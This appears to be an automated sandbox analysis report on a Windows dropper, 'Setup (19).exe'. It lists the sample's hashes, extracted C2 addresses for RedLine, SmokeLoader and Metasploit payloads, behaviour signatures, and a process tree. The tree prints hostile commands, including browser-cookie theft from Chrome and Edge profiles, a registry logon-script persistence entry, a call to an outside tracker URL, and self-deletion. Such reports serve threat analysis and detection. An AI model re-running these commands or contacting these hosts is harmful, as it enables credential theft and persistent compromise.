Analysis

  • max time kernel
    623s
  • max time network
    1796s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (19).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Blocklisted process makes network request 23 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 27 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 34 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 46 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1220
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      PID:2804
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:6888
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2660
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2484
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2472
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1820
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1416
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1300
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1084
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:356
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:2768
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                          2⤵
                            PID:4088
                        • C:\Users\Admin\AppData\Local\Temp\Setup (19).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:416
                          • C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe
                            "C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:2268
                            • C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe
                              C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4500
                          • C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe
                            "C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:3548
                            • C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe
                              C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4528
                          • C:\Users\Admin\Documents\rpl9nvqgaxpw_awAVXLWYUdN.exe
                            "C:\Users\Admin\Documents\rpl9nvqgaxpw_awAVXLWYUdN.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2184
                            • C:\Users\Admin\AppData\Roaming\4389679.exe
                              "C:\Users\Admin\AppData\Roaming\4389679.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4916
                            • C:\Users\Admin\AppData\Roaming\1415455.exe
                              "C:\Users\Admin\AppData\Roaming\1415455.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:4948
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:4156
                          • C:\Users\Admin\Documents\oZqKHdMoBVDsaLfTn6Z1KkWT.exe
                            "C:\Users\Admin\Documents\oZqKHdMoBVDsaLfTn6Z1KkWT.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3176
                          • C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe
                            "C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2332
                            • C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe
                              "C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe"
                              3⤵
                                PID:6852
                            • C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                              "C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:736
                              • C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4472
                            • C:\Users\Admin\Documents\asaqL4jd_iQVgrA0ekmLFUEk.exe
                              "C:\Users\Admin\Documents\asaqL4jd_iQVgrA0ekmLFUEk.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:512
                            • C:\Users\Admin\Documents\zKcbddtu7Wb1ZmPtc2mCX7j6.exe
                              "C:\Users\Admin\Documents\zKcbddtu7Wb1ZmPtc2mCX7j6.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:1676
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 760
                                3⤵
                                • Program crash
                                PID:5492
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 784
                                3⤵
                                • Program crash
                                PID:5228
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 788
                                3⤵
                                • Program crash
                                PID:6080
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 824
                                3⤵
                                • Program crash
                                PID:4412
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 960
                                3⤵
                                • Program crash
                                PID:3864
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 988
                                3⤵
                                • Program crash
                                PID:6068
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1008
                                3⤵
                                • Program crash
                                PID:712
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1412
                                3⤵
                                • Program crash
                                PID:5584
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1368
                                3⤵
                                • Program crash
                                PID:6344
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1468
                                3⤵
                                • Program crash
                                PID:6604
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1420
                                3⤵
                                • Program crash
                                PID:6940
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1612
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                PID:7112
                            • C:\Users\Admin\Documents\fUPCFWCpYnVKUYesSNcWggvE.exe
                              "C:\Users\Admin\Documents\fUPCFWCpYnVKUYesSNcWggvE.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2368
                            • C:\Users\Admin\Documents\6XhF03e2HbN8JNNpmhkGvWrs.exe
                              "C:\Users\Admin\Documents\6XhF03e2HbN8JNNpmhkGvWrs.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3948
                            • C:\Users\Admin\Documents\nznJ2RrcsxvGoRygW3AvVUUi.exe
                              "C:\Users\Admin\Documents\nznJ2RrcsxvGoRygW3AvVUUi.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:1368
                            • C:\Users\Admin\Documents\3gmGDw2Cev9ycJK2_3OV35S6.exe
                              "C:\Users\Admin\Documents\3gmGDw2Cev9ycJK2_3OV35S6.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:1320
                            • C:\Users\Admin\Documents\G6pfKMN8_Qc5VIX27s00Nh3c.exe
                              "C:\Users\Admin\Documents\G6pfKMN8_Qc5VIX27s00Nh3c.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1040
                            • C:\Users\Admin\Documents\ueGXakzzBEF0mfPvr33Uo1UJ.exe
                              "C:\Users\Admin\Documents\ueGXakzzBEF0mfPvr33Uo1UJ.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2100
                            • C:\Users\Admin\Documents\RfTShwmUWNk7wpUxBiLEhRJW.exe
                              "C:\Users\Admin\Documents\RfTShwmUWNk7wpUxBiLEhRJW.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:4104
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 664
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4592
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 676
                                3⤵
                                • Program crash
                                PID:4824
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 684
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:644
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 784
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3900
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 1100
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2864
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 1152
                                3⤵
                                • Program crash
                                PID:4796
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 1144
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3324
                            • C:\Users\Admin\Documents\JYZSNJb0KXgrcbWWd4Hl1BNk.exe
                              "C:\Users\Admin\Documents\JYZSNJb0KXgrcbWWd4Hl1BNk.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3172
                            • C:\Users\Admin\Documents\KnAw0lFIQluShP0KbMpaczDs.exe
                              "C:\Users\Admin\Documents\KnAw0lFIQluShP0KbMpaczDs.exe"
                              2⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:916
                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:2044
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:4856
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4260
                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  • Drops file in Program Files directory
                                  PID:1488
                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:2300
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:3016
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4428
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                      PID:4856
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:2156
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 2300 -s 1528
                                      4⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:1812
                                • C:\Users\Admin\Documents\Uw3q9fiBK_7_tw0vLuiOhMeA.exe
                                  "C:\Users\Admin\Documents\Uw3q9fiBK_7_tw0vLuiOhMeA.exe"
                                  2⤵
                                    PID:3300
                                    • C:\Users\Admin\AppData\Local\Temp\is-9JLVR.tmp\Uw3q9fiBK_7_tw0vLuiOhMeA.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-9JLVR.tmp\Uw3q9fiBK_7_tw0vLuiOhMeA.tmp" /SL5="$90052,138429,56832,C:\Users\Admin\Documents\Uw3q9fiBK_7_tw0vLuiOhMeA.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of FindShellTrayWindow
                                      PID:4288
                                      • C:\Users\Admin\AppData\Local\Temp\is-LI33H.tmp\Setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-LI33H.tmp\Setup.exe" /Verysilent
                                        4⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4824
                                        • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                          "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1108
                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2344
                                          • C:\Users\Admin\AppData\Local\Temp\is-E2MUJ.tmp\Inlog.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-E2MUJ.tmp\Inlog.tmp" /SL5="$30268,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of FindShellTrayWindow
                                            PID:4460
                                            • C:\Users\Admin\AppData\Local\Temp\is-GJ30C.tmp\Setup.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-GJ30C.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                              7⤵
                                                PID:6972
                                                • C:\Users\Admin\AppData\Local\Temp\is-MM2KV.tmp\Setup.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-MM2KV.tmp\Setup.tmp" /SL5="$303DC,17369384,721408,C:\Users\Admin\AppData\Local\Temp\is-GJ30C.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                  8⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:7076
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-BKFI3.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                    9⤵
                                                      PID:6644
                                                      • C:\Windows\SysWOW64\expand.exe
                                                        expand C:\Users\Admin\AppData\Local\Temp\is-BKFI3.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                        10⤵
                                                        • Drops file in Windows directory
                                                        PID:5816
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                      9⤵
                                                        PID:5584
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                          10⤵
                                                            PID:8160
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                          9⤵
                                                          • Checks computer location settings
                                                          PID:4084
                                                        • C:\Users\Admin\AppData\Local\Temp\is-BKFI3.tmp\{app}\vdi_compiler.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-BKFI3.tmp\{app}\vdi_compiler"
                                                          9⤵
                                                            PID:2564
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-BKFI3.tmp\{app}\vdi_compiler.exe"
                                                              10⤵
                                                                PID:9024
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping localhost -n 4
                                                                  11⤵
                                                                  • Runs ping.exe
                                                                  PID:9092
                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                              9⤵
                                                              • Loads dropped DLL
                                                              PID:6096
                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Enumerates connected drives
                                                      • Modifies system certificate store
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4716
                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279838 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                        6⤵
                                                          PID:5760
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:3544
                                                        • C:\Users\Admin\AppData\Local\Temp\is-MIFGP.tmp\WEATHER Manager.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-MIFGP.tmp\WEATHER Manager.tmp" /SL5="$102DC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                          6⤵
                                                            PID:4588
                                                            • C:\Users\Admin\AppData\Local\Temp\is-UF5BN.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-UF5BN.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                              7⤵
                                                                PID:5676
                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-UF5BN.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-UF5BN.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279838 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                  8⤵
                                                                    PID:7476
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:5112
                                                              • C:\Users\Admin\AppData\Local\Temp\is-80ADD.tmp\VPN.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-80ADD.tmp\VPN.tmp" /SL5="$102EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:4072
                                                                • C:\Users\Admin\AppData\Local\Temp\is-O1TQF.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-O1TQF.tmp\Setup.exe" /silent /subid=720
                                                                  7⤵
                                                                    PID:6660
